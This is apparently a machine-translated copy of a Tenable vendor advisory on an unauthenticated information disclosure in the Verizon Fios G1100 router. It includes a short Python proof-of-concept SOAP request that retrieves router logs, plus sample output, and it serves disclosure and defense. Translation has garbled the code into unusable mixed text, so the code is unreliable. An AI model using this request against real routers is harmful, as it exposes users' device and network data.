脸谱网 Google + 推特 LinkedIn YouTube RSS 菜单 搜索 资源——博客 资源-网络研讨会 资源-报告 资源-事件 icons_066 icons_067 icons_068 icons_069 icons_070

(R2) Verizon Fios量子网关G1100远程信息披露

媒介

剧情简介

虽然测试改进Nessus“实现我们发现一个信息披露在Verizon的脆弱性Fios量子网关G1100。G1100有三个“倾听”服务器。一个用户可以禁用和两个他们不能。这个咨询涉及用户的“服务器在端口1901上不能禁用。这个服务器首先引起了我们的注意是因为它的API列表。你可以看到在这个输出列表upnp_info.py

python upnp_info albinolobster@ubuntu: ~ $。py[+]发现“位置[+]发现完整的[+]2位置发现:- > http://192.168.1.1:1990 WFADevice。xml - > http://192.168.1.1:1901 /根。xml(+)加载http://192.168.1.1:1901 root.xml……- >服务器弦:“Linux / 3.4 / 2.0 bhr4/1.2 = = = = = = = XML属性- >设备类型:urn: schemas-upnp-org装置:ManageableDevice: 2 - >友好的名称:Verizon FiOS-G1100 - >制造商:Verizon - >制造商URL: http://www.verizon.com - >模型描述:Verizon Communications Inc .) - >模型名称:FiOS-G1100 - >型号:FiOS-Gen4 - >服务:= >服务类型:urn: schemas-upnp-org服务:BasicManagement: 2 = >控制:/ bms = >事件:/ bmsEvent = > API: http://192.168.1.1:1901 / XML / basic_management_service。xml -重启BaselineReset GetDeviceStatus - SetSequenceMode GetSequenceMode - Ping - GetPingResult网路资讯查询GetNSLookupResult - Traceroute GetTracerouteResult GetBandwidthTestInfo - BandwidthTest GetBandwidthTestResult InterfaceReset - GetInterfaceResetResult GetTestIDs GetActiveTestIDs - GetTestInfo CancelTest GetLogURIs - SetLogInfo GetLogInfo GetACLData = >服务类型:urn: schemas-upnp-org服务:ConfigurationManagement: 2 = >控制:/ cms = >事件:/ cmsEvent = > API: http://192.168.1.1:1901 / xml / configuration_management_service。xml - GetSupportedDataModels GetSupportedParameters getinstance - getvalue GetSelectedValues setvalue - GetAttributes GetConfigurationUpdate GetCurrentConfigurationVersion - GetSupportedDataModelsUpdate GetSupportedParametersUpdate GetAttributeValuesUpdate - GetAlarmsEnabled SetAlarmsEnabled GetACLData = >服务类型:urn: schemas-upnp-org服务:DeviceProtection: 1 = >控制:/ dps = >事件:/ dpsEvent = > API: http://192.168.1.1:1901 / xml / device_protection_service。xml - GetAssignedRoles GetRolesForAction GetACLData - AddIdentityList RemoveIdentity

特别感兴趣的是方法GetLogURIs广告由basic_management_service.xml。我们写了get_log_uris.py行使GetLogURIsAPI。

进口xml.etree。ElementTree,等进口要求进口sys def create_payload():有效载荷= (' < ?xml version = " 1.0 " ?> ' + ' < SOAP-ENV:信封xmlns: SOAP-ENV = " http://schemas.xmlsoap.org/soap/envelope/ " SOAP-ENV: encodingStyle = " http://schemas.xmlsoap.org/soap/encoding/ " >“+”< SOAP-ENV:身体> ' + ' < m: GetLogURIs xmlns: m = " urn: schemas-upnp-org:服务:BasicManagement: 2”>“+”< / m: GetLogURIs >“+”< / SOAP-ENV:身体>“+”< / SOAP-ENV:信封> ")返回负载如果len (sys.argv) ! = 2:打印的用法:/ get_log_uris。py < url >“sys.exit(0)指数= 0载荷= create_payload () soapActionHeader = {“soapaction”:“urn: schemas-upnp-org:服务:BasicManagement: 2 # GetLogURIs '} resp = requests.post (sys。argv [1], data =有效负载,如果resp header = soapActionHeader)。status_code ! = 200:打印错误状态:% d %职责。其他status_code:打印resp.text

执行get_log_uris.py应该像下面这样。

python get_log_uris albinolobster@ubuntu: ~ $。py http://192.168.1.1:1901 bms < ?xml version = " 1.0 " ?> < s:信封xmlns: = " http://schemas.xmlsoap.org/soap/envelope/ "年代:encodingStyle = " http://schemas.xmlsoap.org/soap/encoding/ " > < s:身体> < u: GetLogURIsResponse xmlns: u = " urn: schemas-upnp-org:服务:BasicManagement: 2 " > < LogURIs >日志/ dhcp_client /系统日志,日志/ dhcp_server日志/安全/防火墙日志,日志/ intrusion_detection日志/ parental_control日志“/日志/ sdhl_alert日志/ sdhl_operation日志/ tr69日志/ firmware_update日志/ lpr < / LogURIs > < / u: GetLogURIsResponse > < / s:身体> < / s:信封>

一个未经身份验证的请求的服务器响应一个uri列表。假设路由器使用的地址192.168.1.1uri映射到以下位置:

  1. http://192.168.1.1:1901 /日志/ dhcp_client
  2. http://192.168.1.1:1901 / logs /系统
  3. http://192.168.1.1:1901 /日志/ dhcp_server
  4. http://192.168.1.1:1901 /日志/安全
  5. http://192.168.1.1:1901 /日志/防火墙
  6. http://192.168.1.1:1901 /日志/ intrusion_detection
  7. http://192.168.1.1:1901 /日志/ parental_control
  8. “http://192.168.1.1:1901 /日志/
  9. http://192.168.1.1:1901 /日志/ sdhl_alert
  10. http://192.168.1.1:1901 /日志/ sdhl_operation
  11. http://192.168.1.1:1901 /日志/ tr69
  12. http://192.168.1.1:1901 /日志/ firmware_update
  13. http://192.168.1.1:1901 /日志/ lpr

的时候发现,所有的日志都是可收回的远程未经身份验证的用户(局域网和广域网)。DHCP所包含的一些信息泄露的信息(设备名称、mac地址、局域网IP地址),无线信息(名称、联系客户),而且,由于防火墙的工作方式,一个地址列表,可能是与局域网设备。这里有一些日志样本。请注意,我做清洁一些数据。

了dhcpd: 2017年11月20日15:19:28 local3.info < 158 > DHCPREQUEST 192.168.1.207从ca: fe: c0: ff: ee: 00(通过br-lan DESKTOP-TENABLE) 2017年11月20日15:19:28 local3.info了dhcpd: < 158 > DHCPACK在192.168.1.207 ca: fe: c0: ff: ee: 00(通过br-lan DESKTOP-TENABLE) 2017年11月20日15:19:28 local3.info了dhcpd: < 158 > 192.168.1.207租用了86400秒,更新在0秒,重新绑定在0秒
2017年11月20日上午11:20:28 UTC, justlog.tr98。名称,wifi24 TENABLE_SSID 2017年11月20日11:20:28 UTC, justlog.tr98。wifi24频道11 2017年11月20日11:20:28 UTC, justlog.tr98。wifi24 bssid, ca: fe: c0: ff: ee: 00 2017年11月20日11:20:28 UTC, justlog.tr98。wifi24、x_d4a928_connectionmode B_G_N 2017年11月20日11:20:28 UTC, justlog.tr98。wifi24, associateddevice {associateddevicemacaddress = ca x_d4a928_cur-snr = 17日:菲:c0: ff: ee: 01, x_d4a928_packetstransmitted = 5792358, x_d4a928_packetsreceived = 1236, x_d4a928_transceiversetting = NA x 3: 2, x_d4a928_curtxmodulationrate = 117 Mbps, x_d4a928_standard = N, currssi = -62, x_d4a928_currxmodulationrate = 130 Mbps, x_d4a928_channel = 11, x_d4a928_maxrxmodulationrate = 144.4 Mbps, associateddeviceauthenticationstate = true};{x_d4a928_cur-snr = 20, associateddevicemacaddress = ca: fe: c0: ff: ee: 02, x_d4a928_packetstransmitted = 6474801, x_d4a928_packetsreceived = 71558, x_d4a928_transceiversetting = NA x 3: 2, x_d4a928_curtxmodulationrate = 24 Mbps, x_d4a928_standard = N, currssi = -58, x_d4a928_currxmodulationrate = 144.4 Mbps, x_d4a928_channel = 11, x_d4a928_maxrxmodulationrate = 144.4 Mbps, associateddeviceauthenticationstate = true};{x_d4a928_cur-snr = 0, associateddevicemacaddress = ca: fe: c0: ff: ee: 03, x_d4a928_packetstransmitted = 5869243, x_d4a928_packetsreceived = 44419, x_d4a928_transceiversetting = NA x 3: 1, x_d4a928_curtxmodulationrate = 39 Mbps, x_d4a928_standard = N, currssi = -77, x_d4a928_currxmodulationrate = 43.3 Mbps, x_d4a928_channel = 11, x_d4a928_maxrxmodulationrate = 72.2 Mbps, associateddeviceauthenticationstate = true};{x_d4a928_cur-snr = 7, associateddevicemacaddress = ca: fe: c0: ff: ee: 04, x_d4a928_packetstransmitted = 5792979, x_d4a928_packetsreceived = 27111, x_d4a928_transceiversetting = NA x 3: 1, x_d4a928_curtxmodulationrate = 19.5 Mbps, x_d4a928_standard = N, currssi = -71, x_d4a928_currxmodulationrate = 26 Mbps, x_d4a928_channel = 11, x_d4a928_maxrxmodulationrate = 72.2 Mbps, associateddeviceauthenticationstate = true}]
2017年11月20日15:37:58 local5。注意< 173 > ulogd[655]:阻塞在= eth1 = MAC = ca: fe: c0: ff: ee: 00 SRC = 8.8.8.8 DST = 9.9.9.9 LEN = 83 TOS = 00 PREC = 0 x00 TTL = 59 ID = 4109 DF原型= TCP SPT = 443 DPT = 64543 > = 22216784 = 3489197999窗口= 1175消消PSH URGP = 0 = 0

Verizon固定这个信息披露从广域网禁止访问。路由器所有者不需要采取任何行动升级,因为路由器自动更新本身。不幸的是,这些日志仍可以在本地网络上的任何人。

解决方案

保护从广域网确保您正在使用固件01.04.05.00。没有解决从局域网。

披露时间表

2016-09-21——发现问题
2016-10-04——顾问起草
2016-10-04——报告问题(电子邮件保护),cc(电子邮件保护)在Verizon.com上每个漏洞报告指南
2016-10-04 -供应商自动回复,2016-10-04
2016-10-05——供应商要求固件版本
2016-10-05——站得住脚的发送信息
2016-11-24 -平供应商更新
2017-01-04 -平供应商更新
2017-01-09——供应商回复,抄送其他人在org要求更新
2017-01-09——供应商回复是固定在2月,给一个版本显示不正确地固定或回归站得住脚的测试版本。
2017-01-09——供应商说可能会有混乱在固件版本和补丁,将调查
2017-01-11——供应商说1.04.05.00修复,但在有限的测试部署。将GA 1月下旬
2017-02-27 -平供应商,看看软件按计划推广
2017-03-01——供应商将检查推出状态
2017-03-30——站得住脚的确认固件01.04.00.10仍然脆弱,没有收到一个新版本
2017-08-17——01.04.00.12站得住脚的测试,发现它不是脆弱的WAN一侧

交易报告内的所有信息提供了“是”,没有任何形式的保证,包括适销性的隐含保证和健身为特定目的,并没有保证的完整性、准确性、及时性。个人和组织负责评估任何实际或潜在的安全漏洞的影响。

站得住脚的非常重视产品安全。如果你认为你已经找到一个漏洞在一个我们的产品,我们要求您请与我们共同努力,快速解决它为了保护客户。站得住脚的相信迅速应对这样的报道,与研究人员保持沟通,并提供解决方案。

提交漏洞信息的更多细节,请参阅我们的漏洞报告指南页面。

如果你有问题或修正咨询,请电子邮件(电子邮件保护)

风险信息

成立咨询ID
- 2017 - 35
信贷

雅各布·贝恩斯站得住脚的网络安全

CVSSv2基地/时间的分数
5.0/3.9
CVSSv2向量
AV: N /交流:L /非盟:N / C: P / I: N: N
更多关键字
vecirt - 368459
受影响的产品
Verizon Fios G1100量子网关
风险因素
媒介

咨询时间

11-20-2017 - (R1)最初版本
11-21-2017 - (R2)固定的标题

站得住脚的脆弱性管理

以前Tenable.io


享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

站得住脚的脆弱性管理

以前Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试成立Nessus专业免费的

免费7天

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。

新成立Nessus专家
现在可用

Nessus专家增添了更多的功能,包括外部攻击表面扫描,和添加域和扫描云基础设施的能力。点击这里尝试Nessus专家。

填写下面的表格继续Nessus Pro的审判。

买站得住脚的Nessus专业

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。站得住脚的Nessus专业将帮助自动化漏洞扫描过程,节省时间在你的合规周期,让你与你的团队。

买一个多年的许可并保存。高级支持访问添加到手机、社区和聊天支持一天24小时,一年365天。

选择您的许可

买一个多年的许可并保存。

添加的支持和培训

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问我们的最新的web应用程序扫描提供专为现代应用程序的一部分的一个管理平台。安全扫描整个在线组合漏洞具有高精确度没有重体力工作或中断关键web应用程序。现在报名。

你站得住脚的Web应用程序扫描试验还包括站得住脚的脆弱性管理,成立Lumin站得住脚的云安全。

买站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

5 fqdn

3578美元

现在购买

尝试成立Lumin

可视化和探索你的风险管理,跟踪风险降低随着时间的推移和基准与站得住脚的Lumin你的同行。

你站得住脚的Lumin审判还包括站得住脚的脆弱性管理,站得住脚的Web应用程序扫描和站得住脚的云安全。

买站得住脚的Lumin

联系销售代表如何站得住脚的Lumin可以帮助你了解你的整个组织和管理网络的风险。

尝试站得住脚的云安全

以前Tenable.cs

享受完全访问检测和修复云基础设施配置错误和查看运行时的漏洞。现在注册你的免费试用。了解更多关于审判过程请点击这里。

你站得住脚的云安全试验还包括站得住脚的脆弱性管理,成立Lumin和站得住脚的Web应用程序扫描。

联系销售代表购买站得住脚的云安全

联系销售代表来了解更多关于站得住脚的云安全,看是多么容易机载云账户和获得可见性都几分钟内云配置错误和漏洞。

尝试成立Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经成立Nessus专业吗?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

尝试Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经有了Nessus专业?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

Baidu
map